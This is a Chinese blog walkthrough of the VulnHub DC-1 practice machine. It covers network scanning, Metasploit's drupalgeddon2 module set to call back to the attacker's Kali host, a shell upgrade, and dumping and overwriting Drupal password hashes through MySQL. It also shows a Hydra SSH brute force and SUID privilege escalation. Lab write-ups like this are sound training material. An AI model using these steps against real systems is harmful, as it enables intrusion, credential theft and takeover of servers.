首页 > 其他分享 >DC-1靶机通关教学(DC靶场系列)

DC-1靶机通关教学(DC靶场系列)

时间:2024-08-31 17:51:13浏览次数:13  
标签:admin 端口 DC 用户 密码 靶场 靶机 ###

靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/

下载完靶机之后需要在虚拟机运行,并且要和kali连接同一网段

一、(信息收集)主机发现

arp-scan -l -I eth2

通过扫描发现靶机ip地址是192.168.42.133

二、(信息收集)端口扫描

nmap -A -p- 192.168.42.133

发现目标靶机开放了22端口ssh服务、80端口http服务、111端口PRC服务等

由于开放了22端口,我们可以尝试去爆破一下,但是不行

但是通过扫描我们还发现了80端口,接下来进行访问web页面

三、web渗透

访问靶机ip地址得以下界面

此web服务使用了Drupal CMS模板

cms我们一般从cms出发找漏洞用工具Metasploit找一下漏洞

四、漏洞利用

1.漏洞查找,启动msfconsole使用search drupal搜索相关模块

msfconsole -q  ###安静的启动

search drupal  ###搜索drupal模块

2.漏洞利用,使用unix/webapp/drupal_drupalgeddon2)模块,RHOSTS目标靶机地址,LHOSTS本地kali地址,LPORT设置端口,run执行。

use unix/webapp/drupal_drupalgeddon2)  ###使用模块

set RHOSTS 192.168.42.133   ###此处ip地址为靶机地址

set LHOST 192.168.42.123   ###攻击端kali地址

set LPORT 4444   ###4444为端口需要设置未占用的端口

run

五、GatShell

5.1获得普通shell

然后执行ls命令

5.2获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'ww-data@DC-1:/var/www$

可以看到这个shell的权限只是普通权限,还不是root,不过还能看看文件啦,先看一下发现的flag1.txt文件

每个好的CMS都需要一个配置文件,你也一样,emmm,这个先放着,看看还有没有其他flag文件

好吧,就只有一个flag文件,根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径挺复杂的不过知道名字叫settings.php,我们可以用命令直接搜索并打开,内联执行

(好像不重要的样子),还意外收获了一个数据库,给了账号密码,先登一下看看

六、数据库渗透

由上面得到的用户密码登录进来mysql数据库

登进去了,这样我们就可以为所欲为修改数据库了,先看看有啥东西

接着使用数据库并查看表格

注意这个user这个表,先看一下有什么。注意改小一下字体不然可能会挤爆不美观

得到两个用户

admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR 

Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg 

密码好复杂,应该不是明文,那想登进后台就很难了就很难了,我们可以通过修改admin的密码,或者是新加一个admin

方法一、修改admin密码

我们得先找到加密文件,Drupal的加密脚本在/var/www/scripts/password-hash.sh 目录下,我们先退出mysql 查看加密脚本

这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123456 

得到加密后的密码, 接着我们登入mysql修改一下admin跟Fred的密码

use drupaldb;update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin' or name = 'Fred';

密码修改成功

方法二、添加admin权限用户

drupal7版本在有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

然后看一下脚本的path

可以通过URL下载脚本使用,这里就不多展示了,接着我们用修改好的密码登入

 登进去就找到了flag3,提示了我们一些信息passwd和shadow,明显就是linux的文件

/etc/shadow  该文件存储了系统用户的密码等信息,只有root权限用户才能读取

接着我们查看一下用户信息

可以看到有flag4这个用户,我们有两个方法拿到这个用户的密码,一个是爆破,另一个就是提权打开shadow文件查看密码

七、用户密码爆破

利用工具Hydra爆破flag4的密码

爆破出密码orange,然后我们用kali连接ssh

查看到有一个flag4.txt文件cat看一下

打开了flag4.txt,emmm其实好像也没啥

八、提权

利用find命令,找查具有SUID权限的可执行二进制文件

finde比较常用,可以执行root权限的命令查找文件

可以看到已经提权成功了,接下来我们只要找到剩下的flag就算通关了

拿到第五个flag了,通关成功了

至此,打靶完成以上是我的实操经验,如果各位读者有不懂或者需要纠正的地方请在评论区留言指出,本人看到会第一时间回复

标签:admin,端口,DC,用户,密码,靶场,靶机,###
From: https://blog.csdn.net/qq_73413340/article/details/141561580

相关文章

  • 【应急靶场系列】vulntarget-n-勒索病毒应急靶场
    原创vulntarget乌鸦安全✎阅读须知乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果......
  • TQRFSOC开发板47DR ADC输入采集测试(二)
            本章内容将介绍如何使用RFSOC47DR进行ADC输入采样测试,我们这边提供三个ADC输入采样的python程序,实现8路通道的ADC采样解析数据,并且在时域与频域上显示出示波器与频谱仪的效果。      进入我们提供的47dr_python文件夹。以py后缀的文件一共有四个,其中......
  • 小白学安全:轻松搭建DVWA网站漏洞靶场
    DVWA是一个故意设计成充满漏洞的PHP应用程序,用于渗透测试目的。它包含了多种常见的Web应用程序安全漏洞,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等,让学习者可以在一个安全可控的环境中实践识别和利用这些漏洞的方法,从而更好地理解和防御实际中的网络安全威胁。DVWA提供不......
  • 随笔九、SARADC按键程控测试
    目录1.泰山派环境2.按键3分析3.编程测试1.泰山派环境泰山派开发板上有3个按键按键1是电源按键PWRON,实测按几下会导致开发板重启按键2是复位按键RESET,按下立马复位重启按键3是升级按键RECOVER,配合RESET按键可以使开发板进入Loader烧写模式一般来说开发板都会给......
  • VulNyx - Mail 靶机
    扫描靶机发现22和80端口访问80端口发现id=1和2时都会有回显dirsearch-uhttp://http://192.168.200.39访问这个1和2的路径发现竟然和上面那个id=1和id=2的内容相同这里就可以判断是个include漏洞了用php_filter_chain_generator-main构造伪协议链执行rce......
  • WildCard虚拟卡绑定openAI付款方式
    绑定流程官网:WildCard|一分钟注册,轻松订阅海外软件服务1、使用手机号+验证码注册、可以使用zfb快捷认证2、填写身份信息后,然后根据流程验证即可。3、选择卡片使用期限,填入邀请码【FQBZFT91】可立减$2。4、打开openAI开发者平台:https://platform.openai.com/docs/over......
  • 5G RedCap工业网关的应用场景与优势
    在工业物联网领域,5GRedCap工业网关凭借其低功耗、低成本和高性能的特点,广泛应用于各种工业设备、传感器和控制系统之间的高效连接。不仅支持实时数据采集传输,还能大幅降低部署成本,提升数据传输的可靠性和效率,从而提高生产效率和产品质量。 物通博联推出的5GRedCap工业网关是一款......
  • potato靶机的wp
    Vulnhub-PotatoByzwsoc本次靶机是vulnhub的potato,地址(https://download.vulnhub.com/potato-suncsr/potato-suncsr.ova),下载好以后在虚拟机软件中打开(本人使用的是vmware),设置为nat模式,同kali在同一网段下以后,可以用sudoarp-scan-l,探测到其ip地址。1、nmap做扫描探测2......
  • 「对比评测」标准WPF DataGrid与DevExpress WPF GridControl有何不同?(二)
    DevExpressWPF拥有120+个控件和库,将帮助您交付满足甚至超出企业需求的高性能业务应用程序。通过DevExpressWPF能创建有着强大互动功能的XAML基础应用程序,这些应用程序专注于当代客户的需求和构建未来新一代支持触摸的解决方案。无论是Office办公软件的衍伸产品,还是以数据为中心......
  • OpenCV(cv::findChessboardCorners())
    目录1.函数原型2.使用场景3.工作原理4.示例4.1角点精细化4.2附加标志5.注意事项cv::findChessboardCorners()是OpenCV提供的一个函数,常用于计算机视觉中的棋盘图像角点检测,特别是相机标定(calibration)和三维重建相关的任务中。1.函数原型boolcv::findChessboard......